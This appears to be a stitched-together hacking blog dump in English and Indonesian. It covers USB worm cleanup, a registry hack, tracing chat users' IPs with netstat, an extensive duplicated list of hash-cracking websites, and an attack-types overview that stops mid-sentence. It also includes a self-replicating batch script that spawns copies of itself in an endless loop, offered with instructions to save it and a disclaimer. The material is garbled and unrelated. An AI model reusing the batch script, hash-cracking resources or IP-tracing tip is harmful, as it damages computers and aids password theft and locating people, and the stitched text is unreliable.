    According to prvex.com, here’s what’s gonna happen if you executed it.

    XEAYAL.EXE has been seen to perform the following behavior:
    Executes a Process
    This process creates other processes on disk
    Registers a Dynamic Link Library File
    Uses DNS to retrieve the IP address for web sites
    Visits web sites on your PC without you knowing
    Adds a Registry Key (RUN) to auto start Programs on system start up
    Writes to another Process’s Virtual Memory (Process Hijacking)
    Can communicate with other computer systems using HTTP protocols
    Injects code into other processes
    This Process Deletes Other Processes From Disk

    XEAYAL.EXE has been the subject of the following behavior:
    Created as a process on disk
    Executed as a Process
    Registered as a Dynamic Link Library File
    Added as a Registry auto start to load Program on Boot up
    Has code inserted into its Virtual Memory space by other programs
    Terminated as a Process

    I personally didn’t really trust that website to fix my computer. I am afraid that website will give me more trouble than ”XeAyAl.eXE” if I used the website only scanner to remove the worm. So, I did more research on ways to fix my USB drive. What happened now after I deleted the “XeAyAl.eXE” using Avast Anti Virus, is that I can’t open my USB drive. Every time I am trying to open it, my computer gives me this message:
    Windows cannot find ‘XeAyAl.eXE’. Make sure you typed the
    name correctly, and then try again. To search for a file, click
    the Start buttonm and then click search.

    Windows cannot find ‘XeAyAl.eXE’. Make sure you typed the name correctly, and then try again. To search for a file, click the Start button and then click search.

    After I found a post from forospyware.com, I was kinda guessing that the problem was in my USB drive autorun.inf. Lo and behold, here’s the content of my autorun.inf from my USB drive:

    [AutoRUn]
    acTioN=Open folder to view files
    sHElLexECuTE=XeAyAl.eXE
    ICOn=%SYsteMROOt%\SYSTEm32\shELL32.dlL,4
    USEAUTopLay=1

    Apparently, the actual worm itself, “XeAyAl.eXE”, has been deleted. However, it modified my autorun.inf before it got deleted by Avast antivirus. This modified autorun.inf was causing the USB drive to give me the ‘XeAyAl.eXE’ not-found warning, because the ‘XeAyAl.eXE’ file has been deleted, therefore the OS can’t find the file. To fix this, I deleted the autorun.inf itself. You can also just delete the content of autorun.inf while still keeping the file, if you still want to use autorun.inf for your autorun behaviour of this USB drive. This will fix the problem, guys.

    If you want to follow what’s being said in forospyware.com in the section of how to clean USB drive using flashdesinfector, you can try that too. Let me know if it gives better result for you or not.

    I hope my post will help you to handle ‘XeAyAl.eXE’ worm. If you have any questions or encounter something different, please drop me a comment.

    Add "Take Ownership" to Explorer Right-Click Menu in Win 7 or Vista

    Taking ownership of system files or folders in Windows 7 or Vista is not a simple task. Whether you use the GUI or the command line, it takes far too many steps.

    Thankfully somebody created a registry hack that will give you a menu item for “Take Ownership” that will handle all the steps for you. (If you are the person that originally made this script, let me know and I’ll give you credit)

    Here’s what the new right-click menu will look like after installing this registry hack.
    Install

    Download and unzip the files contained in the zipfile. Double-click the InstallTakeOwnership.reg file and click through the prompts. No reboot necessary.
    Uninstall

    Double-click the RemoveTakeOwnership.reg file and click through the prompts. No reboot necessary.



    Download TakeOwnership.zip

    Sunday, 5 February 2012

    Bagaimana Mengetahui IP dan Lokasi pengguna chating di Facebook / Yahoo / Msn Dengan CMD Command

    Jika beberapa orang yang menambahkan Anda dan Penyalahgunaan dengan Anda dan Anda ingin tahu siapa yang dia dan mengapa dia menyalahgunakan atau berbicara dengan Anda sehingga saya pikir masalah untuk Anda? Jangan khawatir di sini adalah Solusi terbaik

    Ikuti Langkah.
    Pergi ke Start Menu dari Desktop Anda
    Pencarian untuk cmd atau klik Start dan Buka Cmd
    Dan Berikut ini adalah Jenis Command nyaCode:
    netstat -an



    Setelah Anda Ketik Command tekan Enter
    itu akan menampilkan semua ip adress Anda seperti menembak Layar nya, dan setelah anda mendapat IP nya, langsung menuju ke langkah di bawah ini..
    Jadi Berikut ini adalah Situs yang akan membantu Anda untuk melacak Pengguna atau Lokasi pengguna
    Klik Situs ini : http://www.ip-adress.com/ip_tracer/
    Dan Masukkan ip salah satu ia akan menampilkan informasi Alamat dan dll

    batch yang sangat berbahaya, akan merosakkan komputer Anda!

    JGN DI LAKUKAN PADA KOMPUTER ANDA SENDIRI

    Code:Spoiler:

    @echo off
    :A
    SET /A X=%RANDOM%%%1999999999%
    type damage.bat >> %x%.bat
    start %x%.bat
    goto:A



    Nyimpan nya di notepad dgn extention .bat

    saya tidak bertanggung jawab atas idiot yang memutuskan untuk menjalankan kode ini.

    Koleksi Link or Url MD5 Crack

    http://passcracking.com

    http://gdataonline.com/seekhash.php

    http://ice.breaker.free.fr

    http://md5.hashcracking.com

    http://md5decryption.com

    http://www.hashchecker.com

    http://md5crack.it-helpnet.de

    http://linardy.com/md5.php
    http://www.gdataonline.com/seekhash.php
    http://www.md5-db.com/
    https://www.w4ck1ng.com/cracker/
    http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
    http://www.hashchecker.com/index.php?_sls=search_hash
    http://www.milw0rm.com/md5/
    http://www.mmkey.com/md5/
    http://www.rainbowcrack-online.com/
    http://www.securitydb.org/cracker/
    http://www.securitystats.com/tools/hashcrack.php
    http://schwett.com/md5/
    http://www.und0it.com/
    http://www.md5.org.cn/index_en.htm
    http://www.xmd5.org/index_en.htm
    http://www.tmto.org
    http://md5.rednoize.com/
    http://nz.md5.crysm.net/
    http://us.md5.crysm.net/
    http://gdataonline.com/seekhash.php
    http://passcracking.ru/
    http://shm.pl/md5/
    http://www.neeao.com/md5/
    http://md5.benramsey.com/
    http://www.md5decrypt.com/
    http://md5.khrone.pl/
    http://www.csthis.com/md5/index.php
    http://www.md5decrypter.com/
    http://www.md5encryption.com/
    http://www.md5database.net/
    http://md5.xpzone.de/
    http://www.hashreverse.com/
    http://alimamed.pp.ru/md5/
    http://md5crack.it-helpnet.de/index.php?op=add
    http://shm.hard-core.pl/md5/
    http://rainbowcrack.com/
    http://passwordsecuritycenter.com/in...&products_id=7
    https://www.astalavista.net/?cmd=rainbowtables
    http://ice.breaker.free.fr/
    http://www.md5this.com/
    http://hackerscity.free.fr/
    http://md5.allfact.info/
    http://bokehman.com/cracker/
    http://www.tydal.nu/article/md5-crack/
    http://passcracking.com/
    http://ivdb.org/search/md5/
    http://md5.netsons.org/
    http://md5.c.la/
    http://www.md5-db.com/index.php
    http://md5.idiobase.de/
    http://md5search.deerme.org/
    http://sha1search.com/

    http://www.tmto.org/
    http://md5.rednoize.com
    http://nz.md5.crysm.net
    http://us.md5.crysm.net
    http://www.xmd5.org
    http://gdataonline.com
    http://www.hashchecker.com
    http://passcracking.ru
    http://www.milw0rm.com/md5
    http://plain-****.info
    http://www.securitystats.com/tools/hashcrack.php
    http://www.schwett.com/md5/
    http://passcrack.spb.ru/
    http://shm.pl/md5/
    http://www.und0it.com/
    http://www.neeao.com/md5/
    http://md5.benramsey.com/
    http://www.md5decrypt.com/
    http://md5.khrone.pl/
    http://www.csthis.com/md5/index.php
    http://www.md5decrypter.com/
    http://www.md5encryption.com/
    http://www.md5database.net/
    http://md5.xpzone.de/
    http://md5.geeks.li/
    http://www.hashreverse.com/
    http://www.cmd5.com/english.aspx
    http://www.md5.altervista.org/
    http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
    http://alimamed.pp.ru/md5/
    http://md5crack.it-helpnet.de/index.php?op=add
    http://cijfer.hua.fi/
    http://shm.hard-core.pl/md5/
    http://www.mmkey.com/md5/HOME.ASP
    http://www.thepanicroom.org/index.php?view=cracker
    http://rainbowtables.net/services/results.php
    http://rainbowcrack.com/
    http://www.securitydb.org/cracker/
    http://passwordsecuritycenter.com/in...roducts_ id=7
    http://0ptix.co.nr/md5
    https://www.astalavista.net/?cmd=rainbowtables
    http://ice.breaker.free.fr/
    http://www.md5this.com
    http://www.pldsecurity.de/forum/md5.php
    http://www.xeons.net/genesis/
    http://hackerscity.free.fr/
    http://bisix.cogia.net/
    http://md5.allfact.info/
    http://bokehman.com/cracker/
    http://www.tydal.nu/article/md5-crack/
    http://ivdb.org/search/md5/
    http://md5.netsons.org/
    http://md5.c.la/
    http://www.jock-security.com/md5_database/?page=crack
    http://c4p-sl0ck.dyndns.org/cracker.php
    http://www.blackfiresecurity.com/tools/md5lib.php
    http://www.md5-db.com/index.php


    lm Only:
    http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/
    http://www.milw0rm.com/lm (Currently Offline)


    lm + ntlm:
    http://plain-****.info
    http://www.securitystats.com/tools/hashcrack.php
    http://rainbowtables.net/services/results.php
    http://rainbowcrack.com/
    http://passwordsecuritycenter.com/in...roducts_ id=7
    https://www.astalavista.net/?cmd=rainbowtables


    md4:
    http://www.securitystats.com/tools/hashcrack.php
    http://rainbowtables.net/services/results.php
    http://rainbowcrack.com/


    sha1:
    http://passcrack.spb.ru/
    http://www.hashreverse.com/
    http://rainbowcrack.com/
    http://www.md5encryption.com/
    http://www.shalookup.com/
    http://md5.rednoize.com/
    http://c4p-sl0ck.dyndns.org/cracker.php
    http://www.tmto.org/

    http://ice.breaker.free.fr
    http://shm.hard-core.pl/md5/
    http://www.hashchecker.com
    http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/
    http://md5.benramsey.com
    http://md5.altervista.org
    http://shm.hard-core.pl
    http://plain-****.info
    http://hackerscity.free.fr/index.php
    http://www.hashchecker.com
    http://passcracking.com
    http://gdataonline.com/seekhash.php
    http://www.milw0rm.com/md5/insert.php
    http://passcracking.com/
    http://www.md5decrypter.com
    http://blacklight.gotdns.org
    http://www.hashchecker.com
    http://md5.ip-domain.com.cn
    http://www.bigtrapeze.com
    http://opencrack.hashkiller.com"]http://opencrack.hashkiller.com[/url]
    http://md5live.com
    http://www.md5hood.com
    http://us.md5.crysm.net
    http://md5.rednoize.com
    http://ice.breaker.free.fr
    http://shm.hard-core.pl/md5/
    http://www.hashchecker.com
    http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/
    http://md5.benramsey.com
    http://md5.altervista.org
    http://shm.hard-core.pl
    http://plain-text.info
    http://hackerscity.free.fr/index.php
    http://www.hashchecker.com
    http://passcracking.com
    http://gdataonline.com/seekhash.php
    http://www.milw0rm.com/md5/insert.php
    http://www.md5decryption.com/
    http://www.milw0rm.com/cracker/insert.php
    http://md5cracker.tk/
    http://linardy.com/md5.php
    http://www.hashchecker.com/
    http://shm.hard-core.pl/md5/
    http://www.gdataonline.com/seekhash.php
    http://www.hashchecker.com/index.php?_sls=search_hash
    http://schwett.com/md5/
    http://www.md5.org.cn/index_en.htm
    http://www.xmd5.org/index_en.htm
    http://www.tmto.org
    http://md5.rednoize.com/
    http://gdataonline.com/seekhash.php
    http://www.md5decrypt.com

    membuat admin finder sendiri

    15 Jenis Serangan Cracker

    15 Jenis Serangan Cracker


    Seringkali ketika kita menemukan kerawanan ataupun missconfiguration pada system sendiri, kita akan
    menganggap hal itu adalah hal yang kecil, karena kita menanggapinya bukan sebagai lubang keamanan.
    Tools maupun teknik yang digunakan cracker kebanyakan adalah variasi dari serangan yang mereka
    lakukan sebelumnya. Sebagai Administrator baik system maupun jaringan ataupun end user, Anda
    haruslah banyak belajar dari pengalaman penyerangan yang terjadi sebelumnya (walaupun serangan
    tersebut terjadi pada orang lain) untuk menghindari serangan yang akan terjadi berikutnya.
    Mengetahui jenis serangan sangat penting untuk menjaga stabilitas system, sehingga anda tidak perlu
    repot untuk menginstall system baru agar lebih aman, anda hanya perlu mempatch atau bahkan sedikit
    mengkonfigurasi system anda Mungkin bagi beberapa orang tulisan ini merupakan tulisan yang sangat
    mendasar, tapi tidak ada salahnya jika anda sebagai seorang Profesional untuk mereview sesuatu yang
    dasar dari waktu ke waktu.. Artikel ini bukan ditujukan untuk menyerang tetapi sebaliknya yaitu untuk
    bertahan, karena menurut hemat saya untuk bertahan anda harus tahu cara menyerang. Dalam artikel ini
    terdapat serangan yang sering dilakukan oleh cracker dan disetiap serangan mempunyai metode-metode
    tersendiri, contohnya saja dalam melakukan IP spoofing yang mempunyai banyak metode diantaranya
    man in the middle attack. Dengan alasan diatas saya akan mencoba menggaris besarkan seranganserangan
    umum yang sering dilakukan cracker dan harus diketahui oleh seorang Administrator maupun
    end user, sedangkan metode-metode yang lebih spesifik mungkin akan saya tuangkan dalam tulisan saya
    berikutnya baik itu penyerangan ataupun metode yang dilakukan untuk bertahan. Saya tahu tulisan berikut
    adalah jauh dari sempurna, untuk itu saran dan kritik sangat saya harapkan.

    1. IP Spoofing

    IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga
    sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar
    network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan
    serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari
    Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’
    packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk
    routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah
    untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker
    tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.
    Protokol yang menangani komunikasi antar komputer kebanyakan berhasil di spoof. ICMP (Internet
    Control Message Protocol) adalah salah satunya(vulnerable) karena protokol ini dilewati oleh informasi
    dan pesan-pesan kesalahan diantara dua node dalam network. Internet Group Message Protocol(IGMP)
    dapat dieksploitasi dengan menggunakan serangan tipe ini karena IGMP melaporkan kondisi kesalahan
    pada level user datagram, selain itu juga protokol ini mengandung Informasi routing dan Informasi
    Network. (UDP) User Datagram Protocol juga dapat ‘diminta’ untuk menampilkan identitas host sasaran.
    Solusi untuk mencegah IP spoofing adalah dengan cara mengamankan packet-packet yang ditransmisikan
    dan memasang screening policies. Enkripsi Point-to-point juga dapat mencegah user yang tidak
    mempunyai hak untuk membaca data/packet. Autentikasi dapat juga digunakan untuk menyaring source
    yang legal dan bukan source yang sudah di spoof oleh attacker. Dalam pencegahan yang lain,
    Admininistrator dapat menggunakan signature untuk paket-paket yang berkomunikasi dalam networknya
    sehingga meyakinkan bahwa paket tersebut tidak diubah dalam perjalanan.
    Anti Spoofing rules(peraturan anti spoof) yang pada dasarnya memberitahukan server untuk menolak
    packet yang datangnya dari luar yang terlihat datangnya dari dalam, umumnya hal ini akan mematahkan
    setiap serangan spoofing.

    2. FTP Attack
    Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang
    diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk
    mendapatkan command shell ataupun untuk melakukan Denial Of Service.
    Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil
    resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang
    attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa
    membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang
    diserang.
    Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering
    dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki.
    Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di
    upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow
    Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce
    attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff
    informasi yang berada dalam system.

    3. Unix Finger Exploits
    Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi
    diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan
    peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang
    sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk
    melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga
    menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada
    dalam sistem dan seberapa jauh user merawat sistem.
    Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah
    sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi
    seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk
    memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

    4. Flooding & Broadcasting
    Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara
    significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa
    menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan
    dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua
    station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini
    adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya
    menyerah.
    Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or
    volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas
    besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu
    network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup
    power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas
    proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar
    akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.
    Attacker sering kali menggunakan serangan flooding ini untuk mendapatkan akses ke system yang
    digunakan untuk menyerang network lainnya dalam satu serangan yang dinamakan Distributed Denial Of
    Service(DDOS). Serangan ini seringkali dipanggil smurf jika dikirim melaluli ICMP dan disebut fraggles
    ketika serangan ini dijalakan melewati UDP.
    Suatu node (dijadikan tools) yang menguatkan broadcast traffic sering disebut sebagai Smurf Amplifiers,
    tools ini sangat efektif untuk menjalankan serangan flooding. Dengan melakukan spoofing terhadap
    network sasaran, seorang attacker dapat mengirim sebuah request ke smurf amplifier, Network yang di
    amplifiying(dikuatkan) akan mengirim respon kesetiap host di dalam network itu sendiri, yang berarti
    satu request yang dilakukan oleh attacker akan menghasilkan pekerjaan yang sama dan berulang-ulang
    pada network sasaran, hasil dari serangan ini adalah sebuah denial of service yang tidak meninggalkan
    jejak. Serangan ini dapat diantisipasi dengan cara menolak broadcast yang diarahkan pada router.
    TCP-level Flooding (kebanyakan SYN ATTACK) telah digunakan pada bulan februari tahun 2000 untuk
    menyerang Yahoo!, eBay dll yang menggunakan serangan DDOS(Distributed Denial Of Service).
    Network yang tidak menggunakan firewall untuk pengecekan paket-paket TCP biasanya bisa diserang
    dengan cara ini.
    Beberapa fungsi penyaringan pada firewall (Firewall Filtering Function) biasanya akan mampu untuk
    menahan satu serangan flooding dari sebuah alamat IP, tetapi serangan yang dilakukan melalui DDOS
    akan sulit di cegah karena serangan ini seperti kita ketahui datangnya dari berbagai alamat IP secara
    berkala. Sebenarnya salah satu cara untuk menghentikan serangan DDOS adalah dengan cara
    mengembalikan paket ke alamat asalnya atau juga dengan cara mematikan network(biasanya dilakukan
    oleh system yang sudah terkena serangan sangat parah).

    5. Fragmented Packet Attacks
    Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya
    mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa
    firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi
    alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash.
    Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk
    menulis ulang informasi paket pertama dari suatu protokol.
    Paket yang dipecah juga dapat mengakibatkan suasana seperti serangan flooding. Karena paket yang
    dipecah akan tetap disimpan hingga akhirnya di bentuk kembali ke dalam data yang utuh, server akan
    menyimpan paket yang dipecah tadi dalam memori kernel. Dan akhirnya server akan menjadi crash jika
    terlalu banyak paket-paket yang telah dipecah dan disimpan dalam memory tanpa disatukan kembali.
    Melalui cara enumerasi tentang topographi network sasaran, seorang attacker bisa mempunyai banyak
    pilihan untuk meng- crash packet baik dengan cara menguji isi firewall, load balancers atau content –
    based routers. Dengan tidak memakai system pertahanan ini, network sasaran jauh lebih rawan untuk
    perusakan dan pembobolan.
    Karena paket yang dipecah(fragmented packet) tidak dicatat dalam file log sebelum disatukan kembali
    menjadi data yang utuh, packet yang dipecah ini memberikan jalan bagi hacker untuk masuk ke network
    tanpa di deteksi. Telah banyak Intrusion Detection System (IDS) dan saringan firewall(firewall filters)
    yang memperbaiki masalah ini, tapi masih banyak juga system yang masih dapat ditembus dengan cara
    ini.

    6. E-mail Exploits
    Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command
    manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode
    (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email
    bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file
    aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).
    Serangan mail flood (flood =air bah) terjadi ketika banyak sekali e-mail yang dikirimkan oleh attacker
    kepada sasaran yang mengakibatkan transfer agent kewalahan menanganinya, mengakibatkan komunikasi
    antar program lain menjadi tidak stabil dan dapat membuat system menjadi crash. Melakukan flooding
    merupakan cara yang sangat kasar namun efektif, maksudnya untuk membuat suatu mail server menjadi
    down. Salah satu jalan yang menarik dalam melakukan serangan mail-flooding adalah dengan mengexploitasi
    fungsi auto-responder (auto-responder function) yang terdapat dalam kebanyakan aplikasi
    email, ketika seorang attacker menemukan auto-responder yang sedang aktif dalam dua system yang
    berbeda, sang attacker bisa saja mengarahkan yang satu ke yang lainnya, karena kedua-duanya di set
    untuk merespond secara sacara otomatis untuk setiap pesan, maka kedua-duanya akan terus mengenarate
    lebih banyak e-mail secara loop(bolak-balik) dan akhirnya kedua-duanya akan kelelahan dan down.
    Serangan memanipulasi perintah (command manipulation attack) dapat mengakibatkan sebuah system
    menjadi crash dengan cara menggulingkan mail transfer agent dengan sebuah buffer overflow yang
    diakibatkan oleh perintah (fungsi) yang cacat (contoh: EXPN atau VRFY). Perbedaan antara mail flood
    dan command manipulation: command manipulation meng-exploit kekuasaan milik sendmail yaitu
    memperbolehkan attacker untuk mengakses system tanpa informasi otorisasi(menjadi network admin
    tanpa diketahui) dan membuat modifikasi pada penjalanan program lainnya. Mengaktifkan command
    yang cacat seperti diatas juga dapat mengakibatkan seorang attacker mendapatlan akses untuk
    memodifikasi file, menulis ulang, dan tentunya saja membuat trojan horses pada mail server.
    Penyerangan tingkat transport (transport level attack) dilakukan dengan cara mengexploit protokol perute-
    an/pemetaan e-mail diseluruh internet: Simple Mail Tranport Protocol (SMTP). Seorang attacker
    dapat mengakibatkan kondisi kesalahan sementara (temporary error) di target system dengan cara mengoverload
    lebih banyak data pada SMTP buffer sehingga SMTP buffer tidak bisa menanganinya, kejadian
    ini dapat mengakibatkan seorang attacker terlempar dari sendmail program dan masuk kedalam shell
    dengan kekuasaan adminitsrasi bahkan dapat mengambil alih root. Beberapa serangan exploitasi juga
    sering terjadi pada POP dan IMAP.
    Pada saat kerawanan SMTP sulit untuk di exploitasi, attacker mungkin saja berpindah ke serangan
    tranport level jika ia tidak berhasil menyerang dengan cara command manipulation ataupun mail-flood.
    Serangan ini lebih digunakan untuk membuat gangguan daripada untuk menjebol suatu system. Seorang
    attacker biasanya akan menggunakan serangan jenis untuk mem flood Exchange Server dan memotong
    lalu lintas e-mail (trafic e-mail). Serangan ini juga dapat digunakan untuk membuat reputasi suatu
    organisasi menjadi buruk dengan mengirimkan spam atau offensive e-mail ke organisasi lainnya dengan
    sumber dan alamat dari organisasi tersebut.
    Mail relaying, proses memalsukan asal/source email dengan cara meroutekannya ke arah mesin yang akan
    dibohongi, adalah type lain dari serangan transport-level. Teknik ini sangat berguna untuk membuat
    broadcasting spam secara anonymous. Berbagai macam isi(content) yang sering dikirim lewat e-mail
    dengan teknik ini biasanya adalah content-content yang merusak. Beberapa Virus dan Worms akan
    disertakan dalam e-mail sebagai file attachment yang sah, seperti variant Melissa yang nampak sebagai
    Ms Word Macro atau loveletter worm yang menginfeksi system dan mengemailkan dirinya sendiri ke
    users yang berada dalam address booknya outlook. Kebanyakan antivirus scanner akan menangkap
    attachment seperti ini, tetapi visrus dan worm baru serta variannya masih tetap berbahaya.
    Serangan yang terakhir yang dilakukan oleh seorang attacker selain serangan diatas adalah dengan cara
    melakukan social enginering, kadang sang attacker mengirim e-mail dengan source memakai alamat
    admin agar users mengirimkan passwordnya untuk mengupgrade system.

    7. DNS and BIND Vulnerabilities
    Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain
    (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis
    yang diarahkan pada operasi dasar dari Internet (basic internet operation).
    Kesalahan pada BIND sebenarnya bukanlah sesuatu yang baru. Semenjak permulaanya, standar BIND
    merupakan target yang paling favorite untuk diserang oleh komunitas cracker karena beberapa
    kerawanannya. Empat kerawanan terhadap buffer overflow yang terjadi pada bulan Januari lalu hanya
    beberapa bagian dari kerawanan untuk diexploitasi oleh para cracker agar mendapat akses terhadap
    system dan melakukan perintah dengan hak penuh (command execution priviledge).
    Kerawanan pada BIND merupakan masalah yang sangat serius karena lebih dari 80 persen DNS yang
    berada di Jagat Internet dibangun menggunakan BIND. Tanpa adanya DNS dalam lingkungan Internet
    Modern, mungkin transmisi e-mail akan sulit, navigasi ke situs-situs web terasa rumit dan mungkin tidak
    ada hal mudah lainnya yang menyangkut internet.
    Kerawanan BIND bukan hanya terletak pada DNS. System penerjemah alamat (number-address
    translator) merupakan subject dari kebanyakan exploit, termasuk untuk melakukan penyerangan di tingkat
    informasi, penyerangan Denial Of Service, pengambil alihan kekuasaan dengan hijacking.
    Penyerangan di tingkat Informasi bertujuan untuk membuat server menjawab sesuatu yang lain dari
    jawaban yang benar. Salah satu cara untuk melakukan serangan jenis ini adalah melalui cache poisoning,
    yang mana akan mengelabui remote name server agar menyimpan jawaban dari third-party domain
    dengan cara menyediakan berbagai macam informasi kepada domain server yang mempunyai autorisasi.
    Semua pengimplementasian serangan terhadap DNS akan mempunyai kemungkinan besar untuk berhasil
    dilakukan jika jawaban dari suatu pertanyaan yang spesisfik bisa dibohongi (spoof).
    DOS atau membuat Server tidak dapat beroperasi, bisa dilakukan dengan cara membuat DNS menyerang
    dirinya sendiri atau juga dengan cara mengirimkan traffic-flooding yang berlebihan dari luar, contohnya
    menggunakan “Smurf” ICMP flood. Jika suatu organisasi atau perusahaan memasang authoritathive
    name server dalam satu segment yang terletak dibelakang satu link atau dibelakang satu physical area,
    maka hal ini akan menyebabkan suatu kemungkinan untuk dilakukannya serangan Denial Of Service.
    Cracker akan mencoba untuk menyerang system melalui DNS dengan cara buffer overflow, yaitu salah
    satu exploit yang sangan berpotensi pada kerawanan BIND. Gangguan exploit terjadi karena adanya
    kelemahan dalam pengkodean/pemrograman BIND yang mengizinkan seorang attacker untuk
    memanfaatkan code-code yang dapat dieksekusi untuk masuk kedalam system. Beberapa system operasi
    telah menyediakan patch untuk stack agar tidak dapat dieksekusi, sebagaimana juga yang dilakukan
    compiler (menyediakan patch) yang melindungi stack dari overflow. Mekanisme perlindungan ini
    stidaknya membuat cracker akan sulit menggunakan exploit.
    Telah jelas bahwa mengupdate system secara berkala dan menggunakan patch adalah salah satu yang
    harus dilakukan untuk membangun security yang efektif, jika vendor dari DNS anda tidak menyediakan
    patch secara berkala, anda lebih baik mengganti software DNS anda yang menyediakan patch secara
    berkala, tentunya untuk menjaga kemanan system.
    Pada system Unix , BIND harus dijalankan sebagai root untuk mengatur port yang lebih rendah (kodekode
    mesin). Jika software DNS dapat dibodohi untuk menjalankan code-code berbahaya, atau membuka
    file-file milik root, user local mungkin saja bisa menaikan kekuasaannya sendiri didalam mesin.
    Organisasi atau perusahaan yang mengubah authoritative server juga harus waspada bahwa mengganti
    server mereka dalam waktu yang bersamaan akan mengakibatkan domain mereka di hijack melalui cache
    poisoning. Mengubah server seharusnya dilakukan sebagai proses transisi. Untuk mencegah domain
    hijacking sebaiknya network admin terlebih dahulu menambahkn server barunya kedalam network
    infrastucture sebelum mengganti server yang lama.

    8. Password Attacks
    Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak
    perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi
    online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP.
    Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin
    saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka
    sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang
    dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih
    karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat
    meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai
    hal ini dengan cara teknikal. Kebnayakan seranagn yang dilakukan terhadap password adalah menebak
    (guessing), brute force, cracking dan sniffing.
    Penebakan(guessing) password bisa dilakukan dengan cara memasukan password satu persatu secara
    manual ataupun dengan bantuin script yang telah diprogram. Kebanyakan user menggunakan hal-hal yang
    umum untuk password mereka diantaranya tanggal lahir, dan biasanya user tidak menghawatirkan tentang
    aturan yang berlaku pada perusahaan untuk menggunakan kombinasi alphanumeric dan minimal 7
    karakter. Jika saja user memakai tanggal lahirnya sebagai password maka hal penyerangan akan sangat
    mudah dilakukan, karena cracker tidak membutuhkan waktu yang lama hanya untuk menjebol 6 digit
